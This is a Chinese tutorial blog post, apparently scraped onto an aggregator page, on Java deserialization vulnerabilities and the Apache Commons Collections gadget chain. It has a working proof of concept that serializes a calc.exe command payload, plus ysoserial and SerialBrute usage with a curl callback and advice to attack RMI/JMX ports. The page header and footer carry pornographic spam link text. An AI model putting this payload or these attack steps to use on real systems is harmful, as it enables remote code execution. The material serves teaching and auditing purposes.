日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

JAVA反序列化漏洞简单理解

發(fā)布時(shí)間:2024/3/26 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 JAVA反序列化漏洞简单理解 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

反序列化原理?


關(guān)于反序列化的原理不在多說(shuō),和php類似,序列化的數(shù)據(jù)是方便存儲(chǔ)的,而存儲(chǔ)的狀態(tài)信息想要再次調(diào)用就需要反序列化?

Java反序列化的API實(shí)現(xiàn)


實(shí)現(xiàn)方法?

  • Java.io.ObjectOutputStream
  • java.io.ObjectInputStream

序列化:? ObjectOutputStream類 -->?writeObject()

注:該方法對(duì)參數(shù)指定的obj對(duì)象進(jìn)行序列化,把字節(jié)序列寫到一個(gè)目標(biāo)輸出流中,輸出的文件為二進(jìn)制

反序列化: ObjectInputStream類 -->?readObject()

注:該方法從一個(gè)源輸入流中讀取字節(jié)序列,再把它們反序列化為一個(gè)對(duì)象,并將其返回

對(duì)象可序列化的要求

實(shí)現(xiàn)Serializable和Externalizable接口的類的對(duì)象才能被序列化

Externalizable接口繼承自 Serializable接口,實(shí)現(xiàn)Externalizable接口的類完全由自身來(lái)控制序列化的行為,而僅實(shí)現(xiàn)Serializable接口的類可以采用默認(rèn)的序列化方式

序列化實(shí)例

下面給出一個(gè)序列化的實(shí)例,首先是實(shí)現(xiàn)Serializable接口待序列化對(duì)象

public class Employee implements java.io.Serializable{//定義實(shí)現(xiàn)了Serializable接口的Employee類public String name; //定義name變量public String identify; //定義身份變量public void mailCheck(){System.out.println("This is the "+this.identify+" of our company");} //輸出函數(shù) }

序列化類代碼如下

import java.io.*;public class sdemo { //序列化類public static void main(String [] args) //主函數(shù){Employee e = new Employee(); //實(shí)例化Employee類e.name = "admin"; e.identify = "admin"; //實(shí)例化類的屬性try //抓取異常{FileOutputStream fileOut = new FileOutputStream("E:\\test\\test.db"); // 打開一個(gè)文件輸入流ObjectOutputStream out = new ObjectOutputStream(fileOut);// 建立對(duì)象輸入流out.writeObject(e);//輸出反序列化對(duì)象out.close();//關(guān)閉對(duì)象流fileOut.close();//關(guān)閉文件流System.out.printf("數(shù)據(jù)保存在 E:\\test\\test.db文件中");}catch(IOException i){i.printStackTrace();}} }

執(zhí)行函數(shù),如下

文件內(nèi)容如下,也不是很好看懂,畢竟是二進(jìn)制文件,直接打開會(huì)亂碼

而文件的二進(jìn)制形態(tài)是什么樣呢?

java序列化的數(shù)據(jù)庫(kù)一般都是aced0005開頭,當(dāng)然嚴(yán)格來(lái)說(shuō)應(yīng)該是aced開頭,0005有時(shí)候會(huì)不太一樣,我昨天的序列化數(shù)據(jù)就是2005,查詢某些資料說(shuō)是跟什么版本有關(guān)

下面我們對(duì) test.db 文件進(jìn)行反序列化,代碼如下

import java.io.*;public class UnSDemo {public static void main(String [] args){Employee e = null;//和php類似,我們需要有個(gè)對(duì)象來(lái)接受反序列化的數(shù)據(jù)try{FileInputStream fileIn = new FileInputStream("E:\\test\\test.db");// 打開一個(gè)文件輸入流ObjectInputStream in = new ObjectInputStream(fileIn);// 建立對(duì)象輸入流e = (Employee) in.readObject();// 通過(guò)readobject方法讀取對(duì)象in.close();//關(guān)閉對(duì)象流fileIn.close();//關(guān)閉文件流}catch(IOException i) {i.printStackTrace();return;}catch(ClassNotFoundException c) {System.out.println("未發(fā)現(xiàn)test.db文件");c.printStackTrace();return;}System.out.println("反序列化成功...");System.out.println("Name: " + e.name);System.out.println("identify: "+e.identify);} }

執(zhí)行結(jié)果如下

反序列化漏洞

與php飯學(xué)列化漏洞類似,要想產(chǎn)生漏洞,必要的條件就是參數(shù)可控啊

而我們?cè)诶梅葱蛄谢┒吹臅r(shí)候肯定是想getshell或者命令執(zhí)行啊,但是默認(rèn)的readobject方法是無(wú)法幫我們實(shí)現(xiàn)這些要求的,下面說(shuō)一下漏洞的兩大成因

開發(fā)失誤

開發(fā)人員對(duì)反序列化完全沒有進(jìn)行安全審查,在被序列化的對(duì)象類中重寫了readobject方法,那么在反序列的過(guò)程中,會(huì)使用被反序列化類的readObejct方法

如下代碼會(huì)成功彈出計(jì)算器

package com.test; import java.io.*;public class test {public static void main(String args[]) throws Exception{UnsafeClass Unsafe = new UnsafeClass();Unsafe.name = "彈出計(jì)算器";FileOutputStream fos = new FileOutputStream("object");ObjectOutputStream os = new ObjectOutputStream(fos);//writeObject()方法將Unsafe對(duì)象寫入object文件os.writeObject(Unsafe);os.close();//從文件中反序列化obj對(duì)象FileInputStream fis = new FileInputStream("object");ObjectInputStream ois = new ObjectInputStream(fis);//恢復(fù)對(duì)象UnsafeClass objectFromDisk = (UnsafeClass)ois.readObject();System.out.println(objectFromDisk.name);ois.close();} } class UnsafeClass implements Serializable{public String name;//重寫readObject()方法private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{//執(zhí)行默認(rèn)的readObject()方法in.defaultReadObject();//執(zhí)行命令Runtime.getRuntime().exec("calc.exe");} }

如上圖我們?cè)赨nsafeClass類中定義了name屬性,并且重寫了readobject方法,在原有的基礎(chǔ)上添加了執(zhí)行命令的代碼,最中彈出計(jì)算器

而在實(shí)際環(huán)境中,有些常識(shí)的開發(fā)者都不會(huì)直接將命令寫在readObject中,因此此處就需要通過(guò)反射鏈來(lái)進(jìn)行任意代碼執(zhí)行了

基礎(chǔ)庫(kù)中的反序列化漏洞

2015年由黑客Gabriel Lawrence和Chris Frohoff發(fā)現(xiàn)的‘Apache Commons Collections’類庫(kù)直接影響了WebLogic、WebSphere、JBoss、Jenkins、OpenNMS等大型框架。直到今天該漏洞的影響仍未消散。

存在危險(xiǎn)的基礎(chǔ)庫(kù)

  • commons-fileupload 1.3.1
  • commons-io 2.4
  • commons-collections 3.1
  • commons-logging 1.2
  • commons-beanutils 1.9.2
  • org.slf4j:slf4j-api 1.7.21
  • com.mchange:mchange-commons-java 0.2.11
  • org.apache.commons:commons-collections 4.0
  • com.mchange:c3p0 0.9.5.2
  • org.beanshell:bsh 2.0b5
  • org.codehaus.groovy:groovy 2.3.9
  • org.springframework:spring-aop 4.1.4.RELEASE

基礎(chǔ)庫(kù)中的調(diào)用流程一般都比較復(fù)雜,比如org.apache.commons.collections.functors.InvokerTransformer的POP鏈就涉及反射、泛型等

源碼分析

在這里針對(duì)Apache Commons Collections庫(kù)進(jìn)行分析,此漏洞版本是3.2.2以下,在4.4版本中甚至直接刪除了相關(guān)類

官網(wǎng)下載:http://commons.apache.org/proper/commons-collections/download_collections.cgi

其他追蹤分析類文章

  • Java反序列化漏洞-玄鐵重劍之CommonsCollection(上)
  • Java反序列化漏洞-玄鐵重劍之CommonsCollection(下)

概念引入

java中的反射機(jī)制

反射機(jī)制是java的一個(gè)非常重要的機(jī)制,一些著名的應(yīng)用框架都使用了此機(jī)制,如struts、spring、hibernate、android app界面等

java.lang.Class它是java語(yǔ)法的一個(gè)基礎(chǔ)類,用于描述一個(gè)class對(duì)象。在文件系統(tǒng)中,class以文件的形式存在。在運(yùn)行的JVM中,*.class文件被加載到內(nèi)存中成為一個(gè)對(duì)象,該對(duì)象的類型就是java.lang.Class

什么是反射?

在運(yùn)行狀態(tài)中

  • 對(duì)于任意一個(gè)類,都能夠獲取到這個(gè)類的所有屬性和方法
  • 對(duì)于任意一個(gè)對(duì)象,都能夠調(diào)用它的任意一個(gè)方法和屬性(包括私有的方法和屬性)

這種動(dòng)態(tài)獲取信息以及動(dòng)態(tài)調(diào)用對(duì)象的方法的功能就稱為java語(yǔ)言的反射機(jī)制

也就是說(shuō),雖然我們獲取不到該類的源代碼,但是通過(guò)該類的.class文件能反射(Reflect)出這些信息

簡(jiǎn)單來(lái)說(shuō)

反射機(jī)制指的是程序在運(yùn)行時(shí)能夠獲取自身的信息。在java中,只要給定類的名字,那么就可以通過(guò)反射機(jī)制來(lái)獲得類的所有信息

獲取.class字節(jié)碼文件對(duì)象

獲取字節(jié)碼文件對(duì)象的三種方式,有了字節(jié)碼文件對(duì)象才能獲得類中所有的信息,我們?cè)谑褂梅瓷浍@取信息時(shí),也要考慮使用下面哪種方式獲取字節(jié)碼對(duì)象合理,視不同情況而定

//方法一 Class clazz1 = Class.forName("my.Student");//通過(guò)Class類中的靜態(tài)方法forName,直接獲取到一個(gè)類的字節(jié)碼文件對(duì)象,此時(shí)該類還是源文件階段,并沒有變?yōu)樽止?jié)碼文件。包名為 my,類名為 Student //方法二 Class clazz2?= Student.class; ?//當(dāng)類被加載成.class文件時(shí),此時(shí)Student.java類變成了Student.class,該類處于字節(jié)碼階段 //方法三 Student s=new Student(); ? ?//實(shí)例化Student對(duì)象 Class clazz3 = s.getClass(); //通過(guò)該類的實(shí)例獲取該類的字節(jié)碼文件對(duì)象,該類處于創(chuàng)建對(duì)象階段

通過(guò)反射機(jī)制執(zhí)行函數(shù)

下面的代碼中我們利用JAVA?的反射機(jī)制來(lái)調(diào)用計(jì)算器。我們利用了Java的反射機(jī)制把我們的代碼意圖都利用字符串的形式進(jìn)行體現(xiàn),使得原本應(yīng)該是字符串的屬性,變成了代碼執(zhí)行的邏輯

package com.test; import java.lang.reflect.InvocationTargetException;public class FansheTest {public static void main(String[] args) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException, NoSuchMethodException, SecurityException, ClassNotFoundException {Object runtime=Class.forName("java.lang.Runtime").getMethod("getRuntime",new Class[]{}).invoke(null); //得到Runtime.getRuntime()函數(shù)Class.forName("java.lang.Runtime").getMethod("exec", String.class).invoke(runtime,"calc.exe"); //執(zhí)行函數(shù)} }

什么是反射鏈?

沒有找到具體概念,大概理解一下就是,既然是鏈,類似于php中的pop鏈應(yīng)該也是牽扯到了多種類或者對(duì)象,相互間的調(diào)用來(lái)達(dá)成目標(biāo),這可能就是個(gè)反射鏈吧

代碼跟蹤

看了網(wǎng)上許多的文章都是先分析TransformedMap類以及transform()方法的,當(dāng)然這種分析是從發(fā)現(xiàn)漏洞的角度。而我,作為一個(gè)剛學(xué)習(xí)的菜雞,我表示看了十幾篇文章越看越懵逼,畢竟對(duì)java代碼不熟悉,改天還是得找個(gè)同學(xué)給講講

而接下來(lái),我們已知漏洞存在,我們?nèi)ジ櫬┒吹拇a,首先此漏洞是存在于Apache Commons Collections第三方基礎(chǔ)庫(kù)中的,而前面我們已經(jīng)提及要想產(chǎn)生漏洞我們需要對(duì)readobject方法進(jìn)行重寫,我們發(fā)現(xiàn)了這么一個(gè)類,但這個(gè)類應(yīng)該是不在Apache Commons Collections庫(kù)中的,這個(gè)類是AnnotationInvocationHandler

下面是新版本的代碼,可以說(shuō)程序員太叼了。。全給換成了var1-12.??吹氖且荒樸卤?#xff0c;而且新版本添加了UnsafeAccessor類做安全檢測(cè),代碼如下

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {GetField var2 = var1.readFields();Class var3 = (Class)var2.get("type", (Object)null);Map var4 = (Map)var2.get("memberValues", (Object)null);AnnotationType var5 = null;try {var5 = AnnotationType.getInstance(var3);} catch (IllegalArgumentException var13) {throw new InvalidObjectException("Non-annotation type in annotation serial stream");}Map var6 = var5.memberTypes();LinkedHashMap var7 = new LinkedHashMap();String var10;Object var11;for(Iterator var8 = var4.entrySet().iterator(); var8.hasNext(); var7.put(var10, var11)) {Entry var9 = (Entry)var8.next();var10 = (String)var9.getKey();var11 = null;Class var12 = (Class)var6.get(var10);if (var12 != null) {var11 = var9.getValue();if (!var12.isInstance(var11) && !(var11 instanceof ExceptionProxy)) {var11 = (new AnnotationTypeMismatchExceptionProxy(var11.getClass() + "[" + var11 + "]")).setMember((Method)var5.members().get(var10));}}}AnnotationInvocationHandler.UnsafeAccessor.setType(this, var3);AnnotationInvocationHandler.UnsafeAccessor.setMemberValues(this, var7);}

感覺還是老版本的更加人性一點(diǎn)啊,所以還是找一下老版本代碼,最后能不能復(fù)現(xiàn)成功就看緣分了,反正我也不敢亂刪

class AnnotationInvocationHandler implements InvocationHandler, Serializable {private final Class<? extends Annotation> type;private final Map<String, Object> memberValues;AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {this.type = type;this.memberValues = memberValues;}.. //AnnotationInvocationHandler的readObject()函數(shù)中對(duì)memberValues的每一項(xiàng)調(diào)用了setValue()函數(shù)private void readObject(java.io.ObjectInputStream s) throws java.io.IOException, ClassNotFoundException {s.defaultReadObject(); // Check to make sure that types have not evolved incompatibly AnnotationType annotationType = null;try {annotationType = AnnotationType.getInstance(type);} catch(IllegalArgumentException e) {// Class is no longer an annotation type; all bets are offreturn;}Map<String, Class<?>> memberTypes = annotationType.memberTypes();for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {String name = memberValue.getKey();Class<?> memberType = memberTypes.get(name);if (memberType != null) { // i.e. member still existsObject value = memberValue.getValue();if (!(memberType.isInstance(value) || value instanceof ExceptionProxy)) {memberValue.setValue( new AnnotationTypeMismatchExceptionProxy(value.getClass() + "[" + value + "]").setMember( annotationType.members().get(name)));}}}} }

上面的代碼我們可以知道,這個(gè)類有一個(gè)成員變量memberValues,是Map.Entry<String, Object>類型,并且在重寫的 readObject() 方法中有 memberValue.setValue()?修改Value的操作

接下來(lái)就該跟蹤Map是個(gè)什么鬼,setValue又是操作,會(huì)有什么用呢?

Map類 -->?TransformedMap

Map類是存儲(chǔ)鍵值對(duì)的數(shù)據(jù)結(jié)構(gòu)。 Apache Commons Collections中實(shí)現(xiàn)了TransformedMap ,該類可以在一個(gè)元素被添加/刪除/或是被修改時(shí)(即key或value:集合中的數(shù)據(jù)存儲(chǔ)形式即是一個(gè)索引對(duì)應(yīng)一個(gè)值,就像身份證與人的關(guān)系那樣)

該庫(kù)定義了TransformedMap結(jié)構(gòu),其定義了一個(gè)靜態(tài)方法decorate(),可以完成Map結(jié)構(gòu)的轉(zhuǎn)換

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {return new TransformedMap(map, keyTransformer, valueTransformer); }

用此靜態(tài)方法實(shí)現(xiàn)Map類的轉(zhuǎn)換

Map oldMap = new HashMap(); Map newMap = TransformedMap.decorate(oldMap,keyTransformer,valueTransformer);

當(dāng)TransformedMap的setValue()方法被調(diào)用時(shí),會(huì)調(diào)用抽閑父類AbstractInputCheckedMapDecorator的setValue()方法

public Object setValue(Object value) {value = this.parent.checkSetValue(value);return this.entry.setValue(value); }

接著我們又回到TransformedMap的checkSetValue方法,從而調(diào)用了transform()方法,并且,transform()方法的參數(shù)就是setValue()方法的參數(shù)

protected Object checkSetValue(Object value) {return this.valueTransformer.transform(value);}

接下來(lái)跟進(jìn)代碼,我們需要知道那里定義了transform()方法,發(fā)現(xiàn)定義了一個(gè)Transformer接口,其代碼如下

其中定義的transform()方法用來(lái)將一個(gè)對(duì)象轉(zhuǎn)換成另一個(gè)對(duì)象

public interface Transformer {public Object transform(Object input); }

注意在Apache的commons-collections.jar中,默認(rèn)實(shí)現(xiàn)了ConstantTransformer,InvokerTransformer,ChainedTransformer幾個(gè)實(shí)現(xiàn),但我們僅需重點(diǎn)關(guān)注InvokerTransformer類,查看其transform()方法,下面是類的代碼

public class InvokerTransformer implements Transformer, Serializable {/*Input參數(shù)為要進(jìn)行反射的對(duì)象,iMethodName,iParamTypes為調(diào)用的方法名稱以及該方法的參數(shù)類型iArgs為對(duì)應(yīng)方法的參數(shù)在invokeTransformer這個(gè)類的構(gòu)造函數(shù)中我們可以發(fā)現(xiàn),這三個(gè)參數(shù)均為可控參數(shù) */private static final long serialVersionUID = -8653385846894047688L;private final String iMethodName;private final Class[] iParamTypes;private final Object[] iArgs;public static Transformer getInstance(String methodName) {if (methodName == null) {throw new IllegalArgumentException("The method to invoke must not be null");}return new InvokerTransformer(methodName);}public static Transformer getInstance(String methodName, Class[] paramTypes, Object[] args) {if (methodName == null) {throw new IllegalArgumentException("The method to invoke must not be null");}if (((paramTypes == null) && (args != null))|| ((paramTypes != null) && (args == null))|| ((paramTypes != null) && (args != null) && (paramTypes.length != args.length))) {throw new IllegalArgumentException("The parameter types must match the arguments");}if (paramTypes == null || paramTypes.length == 0) {return new InvokerTransformer(methodName);} else {paramTypes = (Class[]) paramTypes.clone();args = (Object[]) args.clone();return new InvokerTransformer(methodName, paramTypes, args);}}private InvokerTransformer(String methodName) {super();iMethodName = methodName;iParamTypes = null;iArgs = null;}public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {super();iMethodName = methodName;iParamTypes = paramTypes;iArgs = args;}public Object transform(Object input) {if (input == null) {return null;}try {Class cls = input.getClass();Method method = cls.getMethod(iMethodName, iParamTypes);return method.invoke(input, iArgs); } catch (NoSuchMethodException ex) {throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");} catch (IllegalAccessException ex) {throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");} catch (InvocationTargetException ex) {throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);}}private void writeObject(ObjectOutputStream os) throws IOException {FunctorUtils.checkUnsafeSerialization(InvokerTransformer.class);os.defaultWriteObject();}private void readObject(ObjectInputStream is) throws ClassNotFoundException, IOException {FunctorUtils.checkUnsafeSerialization(InvokerTransformer.class);is.defaultReadObject();} }

可以看到,上面的transform(),通過(guò)java 反射調(diào)用了input的iMethodName方法

并且 iMethodName 是通過(guò)InvokerTransformer函數(shù)的傳參值得到的,就是說(shuō)iMethodName方法可控

這樣的結(jié)果就是,只要transform()方法被調(diào)用(已再M(fèi)ap類中調(diào)用,用來(lái)checkSetValue),我們的惡意代碼就能被執(zhí)行

下面再介紹兩個(gè)類

  • ChainedTransformer為鏈?zhǔn)降腡ransformer,會(huì)挨個(gè)執(zhí)行我們定義的?Transformer
  • ConstantTransformer類通過(guò)transform轉(zhuǎn)換得到內(nèi)部類的對(duì)象類型,如參數(shù)是Runtime.class時(shí),經(jīng)ConstantTransformer類執(zhí)行后返回java.lang.Runtime

理一下思路

  • 首先構(gòu)造一個(gè)Map和一個(gè)能夠執(zhí)行代碼的ChainedTransformer,
  • 生成一個(gè)TransformedMap實(shí)例
  • 實(shí)例化AnnotationInvocationHandler,其成員變量memberValues就是TransformedMap實(shí)例,并對(duì)其進(jìn)行序列化,
  • 當(dāng)觸發(fā)readObject()反序列化的時(shí)候,就能實(shí)現(xiàn)命令執(zhí)行
import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.util.HashMap; import java.util.Map; import java.util.Map.Entry;import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap;public class main2 {public static void main(String[] args) throws Exception{Transformer[] transformers = new Transformer[] {new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})};Transformer transformedChain = new ChainedTransformer(transformers); //實(shí)例化一個(gè)反射鏈Map innerMap = new HashMap(); //實(shí)例化一個(gè)Map對(duì)象innerMap.put("value", "value");Map outerMap = TransformedMap.decorate(innerMap, null, transformedChain); //將Map對(duì)象和反射鏈作為參數(shù)傳入Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); //得到 AnnotationInvocationHandler類的字節(jié)碼文件Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);ctor.setAccessible(true);Object instance = ctor.newInstance(Target.class, outerMap); //得到我們構(gòu)造好的 AnnotationInvocationHandler類實(shí)例FileOutputStream f = new FileOutputStream("payload.bin");ObjectOutputStream out = new ObjectOutputStream(f); //創(chuàng)建一個(gè)對(duì)象輸出流out.writeObject(instance); //將我們構(gòu)造的 AnnotationInvocationHandler類進(jìn)行序列化out.flush();out.close();} }

如何發(fā)現(xiàn)Java反序列化漏洞

白盒檢測(cè)

當(dāng)持有程序源碼時(shí),可以采用這種方法,逆向?qū)ふ衣┒础?/p>

反序列化操作一般應(yīng)用在導(dǎo)入模板文件、網(wǎng)絡(luò)通信、數(shù)據(jù)傳輸、日志格式化存儲(chǔ)、對(duì)象數(shù)據(jù)落磁盤、或DB存儲(chǔ)等業(yè)務(wù)場(chǎng)景。因此審計(jì)過(guò)程中重點(diǎn)關(guān)注這些功能板塊。

流程如下:

① 通過(guò)檢索源碼中對(duì)反序列化函數(shù)的調(diào)用來(lái)靜態(tài)尋找反序列化的輸入點(diǎn)
可以搜索以下函數(shù):

ObjectInputStream.readObject ObjectInputStream.readUnshared XMLDecoder.readObject Yaml.load XStream.fromXML ObjectMapper.readValue JSON.parseObject

小數(shù)點(diǎn)前面是類名,后面是方法名

② 確定了反序列化輸入點(diǎn)后,再考察應(yīng)用的Class Path中是否包含Apache Commons Collections等危險(xiǎn)庫(kù)(ysoserial所支持的其他庫(kù)亦可)。

③ 若不包含危險(xiǎn)庫(kù),則查看一些涉及命令、代碼執(zhí)行的代碼區(qū)域,防止程序員代碼不嚴(yán)謹(jǐn),導(dǎo)致bug。

④ 若包含危險(xiǎn)庫(kù),則使用ysoserial進(jìn)行攻擊復(fù)現(xiàn)。

黑盒檢測(cè)

在黑盒測(cè)試中并不清楚對(duì)方的代碼架構(gòu),但仍然可以通過(guò)分析十六進(jìn)制數(shù)據(jù)塊,鎖定某些存在漏洞的通用基礎(chǔ)庫(kù)(比如Apache Commons Collection)的調(diào)用地點(diǎn),并進(jìn)行數(shù)據(jù)替換,從而實(shí)現(xiàn)利用。
在實(shí)戰(zhàn)過(guò)程中,我們可以通過(guò)抓包來(lái)檢測(cè)請(qǐng)求中可能存在的序列化數(shù)據(jù)。
序列化數(shù)據(jù)通常以AC ED開始,之后的兩個(gè)字節(jié)是版本號(hào),版本號(hào)一般是00 05但在某些情況下可能是更高的數(shù)字。
為了理解反序列化數(shù)據(jù)樣式,我們使用以下代碼舉例:

import java.io.*;public class SerializeDemo {public static void main(String [] args){Employee e = new Employee();e.name = "員工甲";e.identify = "General staff";try{// 打開一個(gè)文件輸入流FileOutputStream fileOut =new FileOutputStream("D:\\Task\\employee1.db");// 建立對(duì)象輸入流ObjectOutputStream out = new ObjectOutputStream(fileOut);//輸出反序列化對(duì)象out.writeObject(e);out.close();fileOut.close();System.out.printf("Serialized data is saved in D:\\Task\\employee1.db");}catch(IOException i){i.printStackTrace();}} }

在本地環(huán)境下運(yùn)行一下,即可看到生成的employee1.db文件。
生成的employee1.db反序列化數(shù)據(jù)為(可用Winhex、Sublime等工具打開):

需要注意的是,AC ED 00 05是常見的序列化數(shù)據(jù)開始,但有些應(yīng)用程序在整個(gè)運(yùn)行周期中保持與服務(wù)器的網(wǎng)絡(luò)連接,如果攻擊載荷是在延遲中發(fā)送的,那檢測(cè)這四個(gè)字節(jié)就是無(wú)效的。所以有些防火墻工具在檢測(cè)反序列化數(shù)據(jù)時(shí)僅僅檢測(cè)這幾個(gè)字節(jié)是不安全的設(shè)置。

所以我們也要對(duì)序列化轉(zhuǎn)儲(chǔ)過(guò)程中出現(xiàn)的Java類名稱進(jìn)行檢測(cè),Java類名稱可能會(huì)以“L”開頭的替代格式出現(xiàn) ,以';'結(jié)尾 ,并使用正斜杠來(lái)分隔命名空間和類名(例如 “Ljava / rmi / dgc / VMID;”)。除了Java類名,由于序列化格式規(guī)范的約定,還有一些其他常見的字符串,例如 :表示對(duì)象(TC_OBJECT),后跟其類描述(TC_CLASSDESC)的'sr'或 可能表示沒有超類(TC_NULL)的類的類注釋(TC_ENDBLOCKDATA)的'xp'。

識(shí)別出序列化數(shù)據(jù)后,就要定位插入點(diǎn),不同的數(shù)據(jù)類型有以下的十六進(jìn)制對(duì)照表:

0x70 - TC_NULL 0x71 - TC_REFERENCE 0x72 - TC_CLASSDESC 0x73 - TC_OBJECT 0x74 - TC_STRING 0x75 - TC_ARRAY 0x76 - TC_CLASS 0x7B - TC_EXCEPTION 0x7C - TC_LONGSTRING 0x7D - TC_PROXYCLASSDESC 0x7E - TC_ENUM

AC ED 00 05之后可能跟上述的數(shù)據(jù)類型說(shuō)明符,也可能跟77(TC_BLOCKDATA元素)或7A(TC_BLOCKDATALONG元素)其后跟的是塊數(shù)據(jù)。

序列化數(shù)據(jù)信息是將對(duì)象信息按照一定規(guī)則組成的,那我們根據(jù)這個(gè)規(guī)則也可以逆向推測(cè)出數(shù)據(jù)信息中的數(shù)據(jù)類型等信息。并且有大牛寫好了現(xiàn)成的工具-SerializationDumper

用法:
java -jar SerializationDumper-v1.0.jar aced000573720008456d706c6f796565eae11e5afcd287c50200024c00086964656e746966797400124c6a6176612f6c616e672f537472696e673b4c00046e616d6571007e0001787074000d47656e6572616c207374616666740009e59198e5b7a5e794b2

后面跟的十六進(jìn)制字符串即為序列化后的數(shù)據(jù)

工具自動(dòng)解析出包含的數(shù)據(jù)類型之后,就可以替換掉TC_BLOCKDATE進(jìn)行替換了。AC ED 00 05經(jīng)過(guò)Base64編碼之后為rO0AB

在實(shí)戰(zhàn)過(guò)程中,我們可以通過(guò)tcpdump抓取TCP/HTTP請(qǐng)求,通過(guò)SerialBrute.py去自動(dòng)化檢測(cè),并插入ysoserial生成的exp

SerialBrute.py -r <file> -c <command> [opts]
SerialBrute.py -p <file> -t <host:port> -c <command> [opts]

使用ysoserial.jar訪問(wèn)請(qǐng)求記錄判斷反序列化漏洞是否利用成功:
java -jar ysoserial.jar CommonsCollections1 'curl " + URL + " '

當(dāng)懷疑某個(gè)web應(yīng)用存在Java反序列化漏洞,可以通過(guò)以上方法掃描并爆破攻擊其RMI或JMX端口(默認(rèn)1099)。

參考文章

https://www.cnblogs.com/KevinGeorge/p/8448967.html

https://xz.aliyun.com/t/2041

https://www.freebuf.com/articles/web/149931.html

https://www.jianshu.com/p/4060bb2e24cb

https://www.freebuf.com/column/155381.html

https://blog.csdn.net/u010651541/article/details/78369181

總結(jié)

以上是生活随笔為你收集整理的JAVA反序列化漏洞简单理解的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

在线免费观看视频一区 | 成人免费看片网址 | 日韩a在线播放 | 99久久电影 | 99麻豆久久久国产精品免费 | 亚洲免费小视频 | www.综合网.com | 五月天电影免费在线观看一区 | 国产一区网址 | 97av影院| 国产视频69 | 成年人黄色免费看 | 丝袜av一区 | 国产99久久久久 | 99国产在线观看 | 亚洲在线成人精品 | 日韩精品视频免费 | 欧美特一级片 | 成人av在线网 | www99久久| 91视频 - x99av| 天天射天天操天天色 | 草久电影| www日日| 色婷婷av国产精品 | 国产精品国产三级国产 | 国产精品12 | 国产精品一区二区电影 | 天天操天天弄 | 天天色影院| 欧美在线视频精品 | 色悠悠久久综合 | 最新动作电影 | 国产一级二级在线观看 | 一区二区精品在线视频 | 91精彩视频 | 97在线免费 | 在线观看aaa | 免费毛片aaaaaa | av黄网站| 四虎成人精品永久免费av九九 | 91精品办公室少妇高潮对白 | 国产成人av网址 | 天天弄天天干 | 一本一本久久a久久精品牛牛影视 | 成人av在线直播 | 九草在线视频 | 97视频资源 | 亚洲一区二区精品3399 | 亚洲最新合集 | 欧美网址在线观看 | 中文av在线免费观看 | 久久久久久久国产精品 | 久久亚洲免费视频 | 在线av资源 | 欧美精品久久久久久久久久 | 夜夜操综合网 | 久久美女电影 | 日日爱999 | 欧美激情视频在线免费观看 | 丁香激情五月 | 免费观看一级特黄欧美大片 | 丁香网五月天 | 青草视频在线 | 一区二区三区在线看 | 人人超碰人人 | 999久久久久久久久6666 | 操久在线| 在线观看视频国产一区 | 亚洲另类交 | 久久人91精品久久久久久不卡 | 久久午夜网 | 欧美性生活久久 | 日本电影久久 | 97人人模人人爽人人喊网 | 亚洲va欧美 | 精品国产乱码一区二 | 婷婷六月天天 | 欧美精品一区二区在线观看 | av观看网站 | 最新一区二区三区 | 亚洲日本韩国一区二区 | 日韩性片 | 亚洲天堂在线观看完整版 | 字幕网在线观看 | 国产黄色精品在线 | 国产精品综合久久久 | 精品视频网站 | 国产九九九视频 | 99色在线播放 | 日产乱码一二三区别免费 | 欧美成人h版电影 | 久久久污 | 狠狠躁日日躁狂躁夜夜躁av | 欧美一区日韩一区 | 久久免费视频国产 | av黄色av| 欧美日在线观看 | 日韩国产欧美在线视频 | 91av中文字幕 | 国产字幕在线看 | 在线中文字幕av观看 | 久久精品视频国产 | 日本久久综合网 | 一区中文字幕 | 国产一级电影 | 在线免费观看黄色av | 999精品网| 欧美日韩免费看 | 国产在线免费观看 | 国产麻豆精品久久一二三 | 色先锋av资源中文字幕 | 中文字幕 婷婷 | 国产又粗又猛又黄又爽视频 | 中文字幕在线看视频国产 | 97超碰人人澡人人 | 日韩午夜高清 | 五月天婷婷在线观看视频 | www视频在线播放 | 久久婷婷一区二区三区 | 激情五月婷婷综合 | 国内精品国产三级国产aⅴ久 | 手机av在线网站 | 日韩激情视频在线观看 | 日本在线观看中文字幕无线观看 | 怡红院av久久久久久久 | 亚洲国产人午在线一二区 | 天天·日日日干 | 91视频免费看片 | 国产精品久久久久久久妇 | 日韩精品一区二区三区丰满 | 色婷婷综合久久久久 | 亚洲精品一区中文字幕乱码 | 